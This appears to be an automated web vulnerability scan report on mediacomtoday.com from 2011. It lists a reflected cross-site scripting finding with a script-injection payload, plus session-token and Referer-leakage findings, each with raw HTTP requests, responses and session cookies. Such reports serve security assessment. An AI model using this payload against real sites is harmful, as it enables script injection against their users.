The value of REST URL parameter 1 is copied into an HTML comment. The payload 83cb0--><script>alert(1)</script>00908e2c4c2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /index.php83cb0--><script>alert(1)</script>00908e2c4c2?inc=11 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=10
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313362413862; dslv=1313362413863; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 404 Not Found
Date: Sun, 14 Aug 2011 23:31:10 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 22066
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
   <head>
       <title>Home-Mediacom</ti
...[SNIP]...
<!-- 0 :: /index.php83cb0--><script>alert(1)</script>00908e2c4c2 :: columns[yes] :: mode[w] -->
...[SNIP]...

2. Session token in URL  previous  next

Summary

Severity:   Medium
Confidence:   Firm
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The response contains the following links that appear to contain session tokens:

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

Request

GET /index.php?inc=1 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:31:18 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135453
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<li><a href="/gothere.php?premium=yummy&amp;token=dk_pack&amp;path=/provisioning/learning/?sc_cid=dklearning" title="" class="yummy_dk_pack">DK Learning</a>
...[SNIP]...
<li><a href="/gothere.php?premium=yummy&amp;token=atari_classics&amp;sc_cid=atari" title="" class="yummy_atari_classics">Atari Classic Games</a>
...[SNIP]...
<li><a href="/gothere.php?premium=yummy&amp;token=yummy_arcade&amp;sc_cid=yummy" title="" class="yummy_yummy_arcade">Yummy</a>
...[SNIP]...

3. Cross-domain Referer leakage  previous  next
There are 37 instances of this issue:

Issue background

When a web browser makes a request for a resource, it typically adds an HTTP header, called the "Referer" header, indicating the URL of the resource from which the request originated. This occurs in numerous situations, for example when a web page loads an image or script, or when a user clicks on a link or submits a form.

If the resource being requested resides on a different domain, then the Referer header is still generally included in the cross-domain request. If the originating URL contains any sensitive information within its query string, such as a session token, then this information will be transmitted to the other domain. If the other domain is not fully trusted by the application, then this may lead to a security compromise.

You should review the contents of the information being transmitted to other domains, and also determine whether those domains are fully trusted by the originating application.

Today's browsers may withhold the Referer header in some situations (for example, when loading a non-HTTPS resource from a page that was loaded over HTTPS, or when a Refresh directive is issued), but this behaviour should not be relied upon to protect the originating URL from disclosure.

Note also that if users can author content within the application then an attacker may be able to inject links referring to a domain they control in order to capture data from URLs used within the application.

Issue remediation

The application should never transmit any sensitive information within the URL query string. In addition to being leaked in the Referer header, such information may be logged in various locations and may be visible on-screen to untrusted parties.


3.1. http://www.mediacomtoday.com/ads/displayad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/displayad.php?name=footer_ros_btf_728x90_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:02:26 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 913
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ad</title>
<meta htt
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/syn.mediacom/footer;tile=1;sz=728x90;postalcode=;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/syn.mediacom/footer;tile=1;sz=728x90;postalcode=;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...

3.2. http://www.mediacomtoday.com/ads/displayad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/displayad.php?name=home_main_atf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_cc=true; s_nr=1313344950958; dslv=1313344950990; dslv_s=First%20Visit; s_vnum=1315936950998%26vn%3D1; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:31:25 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 910
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ad</title>
<meta htt
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/syn.mediacom/home;tile=1;sz=300x250;postalcode=;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/syn.mediacom/home;tile=1;sz=300x250;postalcode=;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...

3.3. http://www.mediacomtoday.com/ads/displayad.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /ads/displayad.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ads/displayad.php?name=home_main_btf_300x250_tag HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 18:02:28 GMT
Server: Apache
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 922
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Ad</title>
<meta htt
...[SNIP]...
<noscript><a href="http://ad.doubleclick.net/jump/syn.mediacom/home_btf;tile=1;sz=300x250;postalcode=;ord=123456789?" target="_blank" ><img src="http://ad.doubleclick.net/ad/syn.mediacom/home_btf;tile=1;sz=300x250;postalcode=;ord=123456789?" border="0" alt="" /></a>
...[SNIP]...

3.4. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=27 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=26
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313390345032; dslv=1313390345033; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 07:07:17 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 133728
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=28" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;d73f3adc;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;f5a8cb38;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/29.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" href="http://www.americanwebinc.com/AW_Flip_Books/Pause/Issue_15/index.html" title="Pause"><img src="/cmsimages/Pause_promo.jpg" alt="Pause" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.5. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=4 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313350190874; dslv=1313350190875; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 19:58:35 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 135560
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=5" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;c6280d61;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;1c34b7b2;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<p>Flash is required to view this content. Please install the <a href="http://www.macromedia.com/go/getflashplayer" title="Install Adobe Flash Player" target="_blank">Adobe Flash Player</a>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/weather/images/small/30.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="services_logo_wrap dynamic" title="">
       <img src="http://static.garnet.synacor.com/assets/en_US/components/horoscope/images/Capricorn.png" alt="" />
       <span class="services_tab_title">
...[SNIP]...
<div class="services_loading">
                           <img src="http://static.garnet.synacor.com/assets/en_US/globals/images/loading.gif" alt="" />
                           <div>
...[SNIP]...
<div class="slide"><a target="_blank" onclick="Syn.Tracking.tl(this, 'o', 'ufc133');" href="http://www.ufc.com/event/UFC133#/fight" title="UFC 133"><img src="/cmsimages/UFC133_promo.jpg" alt="UFC 133" />
...[SNIP]...
<li><a target="_blank" href="http://api.nextag.com/goto.jsp?p=52865&url=/serv/MediaCom/buyer/Home.jsp">Shopping</a>
...[SNIP]...
<li><a target="_blank" href="https://ihelp.mediacombb.net/">Manage Email Accounts</a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com">www.mediacomcable.com</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_terms.html">Terms of Use</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_privacy.html">Privacy Policy</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_copyright.html">Copyright and Trademark Policies</a>
...[SNIP]...
<li><a target="_blank" href="http://www.mediacomcable.com/legal_email.html">Fraud and Abuse</a>
...[SNIP]...

3.6. http://www.mediacomtoday.com/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.mediacomtoday.com
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?inc=5 HTTP/1.1
Host: www.mediacomtoday.com
Proxy-Connection: keep-alive
Referer: http://www.mediacomtoday.com/index.php?inc=4
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: temporalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; eternalchip=NTAuMjMuMTIzLjEwNjoxMzEzMzQ0OTM5; session=f933210f4fd18d524138cd1c1d5a4bed1cf9af1e-1313344939; s_vnum=1315936950998%26vn%3D1; s_cc=true; s_nr=1313351937705; dslv=1313351937706; dslv_s=First%20Visit; s_invisit=true; omni_gpn=homepage; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sun, 14 Aug 2011 20:27:41 GMT
Server: Apache
Vary: Accept-Encoding
P3P: CP="ALL DSP COR TAIa PSAa PSDa IVAa IVDa CONi OUR IND UNI"
Content-Length: 134998
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>Home - Welcome to Mediacom</title>
   <meta n
...[SNIP]...
<meta http-equiv="refresh" content="1740;url=http://www.mediacomtoday.com/index.php?inc=6" />


   <link rel="shortcut icon" href="http://images.synacor.com/clientimages/13312/71941.ico" />


   <!-- Stylesheets -->
   
       <link rel="stylesheet" type="text/css" href="http://static.garnet.synacor.com/assets/res.php?s;mediacom;en_US;9a84b3f3;styles!welcome_bar~components*movers_and_shakers@mediacom_networks=free_games_promo+services$ad_placement,message_bar^marketwatch/account_nav?localevents{header_main}PremiumMenu|pagination\header_bar[top_movies]en_US(globals(!(global;global_client))pages(home(!(home)))*(header([(!([))}(!(})logo(!(logo))search(!(search))))nav(!(nav))?(!(?;account_nav_override))^(!(^))~(!(~))slideshow(!(slideshow))dcc(!(default;dcc_override)slides(!(default;slide_override)))))cms:(((@)))en_US(*(@(!(movers_and_shakers_override))feed(!(feed))/(!(/))$(!($;services_override))movie(](!(];top_movies_override))listings(!(listings)))watercooler(!(watercooler_single;watercooler_single_override))video(embedded(!(flash_r_horiz_carousel))){(!({;localevents_override))+(!(+;free_games_promo_override))\(!(\;pagination_override))login(~(!(~)))component_discovery(!(reveal))$(!(sprite)login(!(login))),(!(,))=(!(=))))cms:(mediacom_house_ads)en_US(*(|(!(|))))cms:(footer_nav;footer_links" />
   
   <!-- /Stylesheets -->
...[SNIP]...
<!-- Javascript -->
   
       <script type="text/javascript" src="http://static.garnet.synacor.com/assets/res.php?j;mediacom;en_US;0a720b96;javascripts!scripts~plugins*component_discovery@components=free_games_promo+3rdparty$globals,PremiumMenu^marketwatch/account_nav?localevents{watercooler}header_bar|pagination\welcomebar[top_movies]en_US(,(!($(jquery(jquery-1.4.2.min;*(jquery.jsonp-2.1.0;jquery.cookie)class)json(json))framework(synjquery;synuifilemgr;syncomponent;syncomponentutils;syncomponentmgr;syntrack;synjsextensions;synimageloader;synads)))=(header(|(~(|)))search(~(search_bar;smartsearchbarfocus))nav(~(nav))?(!(?))@(~(browse_place;personalize))slideshow(!(fw_slideshow))dcc(!(slide;tab))feed(!(feed))/(!(/))movie(](!(])))locatable(~(locatable))movie(listings(~(listings)))),(!($(jquery(jcarousellite_1.0.1))))=(}(!(}))),(!($(flash(swfobject))framework(synhelpers)))=(video(!(video_player;player(api(play_api)events(events)config(config;jw_config)decorators(*(*)abstract_decorator;*(ads(abstract_ads;jw_ads)controls(jw_controls)controller(jw_controller)))adapters(abstract_adapter;jw_adapter)))embedded(~(videoembedded-base;videoembedded))){(~({))+(!(+))\(!(\))[(!([))@(~(reveal))services(~(services))^(js(^))cms(~(slideshow))omniture(!(omniture;*;sitecatalyst"></script>
...[SNIP]...
<li><a href="http://www.mediacomcable.com" target="_blank">www.mediacomcable.com</a>
...[SNIP]...
<li>
                       <a href="http://api.nextag.com/goto.jsp?p=52865&amp;url=/serv/MediaCom/buyer/Home.jsp" target="_blank" class="nav_shopping">
                           Shopping
                       </a>
...[SNIP]...
<li><a target="_blank" href="http://mediacomcable.com/CustomerSupport/">Customer Support</a>
...[SNIP]...
